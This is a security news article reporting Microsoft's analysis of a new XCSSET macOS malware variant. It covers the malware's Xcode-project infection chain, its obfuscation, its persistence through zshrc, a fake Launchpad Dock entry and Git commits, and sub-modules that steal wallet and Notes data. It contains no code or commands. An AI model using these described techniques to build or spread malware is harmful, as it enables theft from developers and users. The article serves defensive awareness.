XCSSET macOS Malware

Microsoft said it has discovered a new variant of a known Apple macOS malware called XCSSET as part of limited attacks in the wild.

"Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies," the Microsoft Threat Intelligence team said in a post shared on X.

"These enhanced features add to this malware family's previously known capabilities, like targeting digital wallets, collecting data from the Notes app, and exfiltrating system information and files."

XCSSET is a sophisticated modular macOS malware that's known to target users by infecting Apple Xcode projects. It was first documented by Trend Micro in August 2020.

Subsequent iterations of the malware have been found to adapt to compromise newer versions of macOS as well as Apple's own M1 chipsets. In mid-2021, the cybersecurity company noted that XCSSET had been updated to exfiltrate data from various apps like Google Chrome, Telegram, Evernote, Opera, Skype, WeChat, and Apple first-party apps such as Contacts and Notes.

Cybersecurity

Another report from Jamf around the same time revealed the malware's ability to exploit CVE-2021-30713, a Transparency, Consent, and Control (TCC) framework bypass bug, as a zero-day to take screenshots of the victim's desktop without requiring additional permissions.

Then, over a year later, it was updated again to add support for macOS Monterey. As of writing, the origins of the malware remain unknown.

The latest findings from Microsoft mark the first major revision since 2022, using improved obfuscation methods and persistence mechanisms that are aimed at challenging analysis efforts and ensuring that the malware is launched every time a new shell session is initiated.

Another novel manner XCSSET sets up persistence entails downloading a signed dockutil utility from a command-and-control server to manage the dock items.

"The malware then creates a fake Launchpad application and replaces the legitimate Launchpad's path entry in the dock with this fake one," Microsoft said. "This ensures that every time the Launchpad is started from the dock, both the legitimate Launchpad and the malicious payload are executed."

Given that XCSSET spreads through infected projects, users are recommended to always inspect and verify any Xcode projects downloaded or cloned from repositories before using them. It's also advised to only install apps from trusted sources, such as a software platform's official app store.

Update

In a follow-up analysis published on March 11, 2025, Microsoft said the XCSSET malware features "enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies" that allow it to steal and exfiltrate files and system and user information, such as digital wallet data and notes.

"XCSSET is known for infecting Xcode projects and runs while an Xcode project is being built," Microsoft Threat Intelligence said. "Since Xcode is typically used by software developers, we assess that the malware's mode of infection and propagation leverages on the idea that project files are shared among developers building Apple or macOS-related applications."

Other changes include a modular approach, improved error handling, and the use of three distinct persistence techniques, which ensure its payload gets launched whenever a new shell session is initiated or whenever a user is tricked into opening a fake Launchpad application or makes commits in Git.

Another significant change concerns a new infection method for where the malware places its payload in a target Xcode project. Further evidence suggests that some of the modules are under active development, indicating that the threat actors behind the malware are refining their tools and tradecraft.

The attack chain is a four-step process -

  • The execution of a shell payload when a user unknowingly builds an infected Xcode project, which then downloads an obfuscated shell command
  • The execution of the shell command, which is designed to collect and transmit operating system information to an external server and fetch an additional shell script payload
  • The execution of the shell script, which checks if the device's XProtect version is less than 5287 and then creates an AppleScript-compiled application using osacompile
  • The execution of the created AppleScript application, which, in turn, runs a shell command to obtain the final-stage AppleScript, which is responsible for collecting system information and launching various sub-modules
Cybersecurity

The list of sub-modules is as follows -

  • seizecj, which steals system information
  • fpzfcieoci, which lists web browser extensions installed on the machine across Brave, Google Chrome (and its Canary and Beta versions), Microsoft Edge, Mozilla Firefox, and Opera
  • hxasoxtfd, which downloads an additional module from a command-and-control (C2) server
  • txzx_vostfdi, which steals data from digital wallet browser extensions like MetaMask, TokenPocket, TronLink, BNB Chain Wallet, and Phantom Wallet
  • hfdieiz, which establishes persistence using two methods, zshrc and Dock
  • cozfi_xhh, which steals data from the Apple Notes application
  • vectfd_xhh, which refers to a common module that's used to launch a fake application for loading the main module
  • dfhsebxzod, which infects Xcode projects
  • jez, which establishes persistence through Git commits
  • uhsoxtfd_vostfd, which exfiltrates files from a specified target folder (assessed to be under development)
  • fpfb, which enumerates and exfiltrates directory listings (assessed to be under development)
  • vectfd, which exfiltrates files matching a specific pattern (assessed to be under development)

"The new XCSSET variant obfuscated its module names, making it difficult to determine the modules’ intent during static analysis. Its enhanced obfuscation techniques extend to its randomized approach for generating payloads to infect Xcode projects and for encoding its payloads," Microsoft said.

(The story was updated after publication to include additional analysis of the malware.)


Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.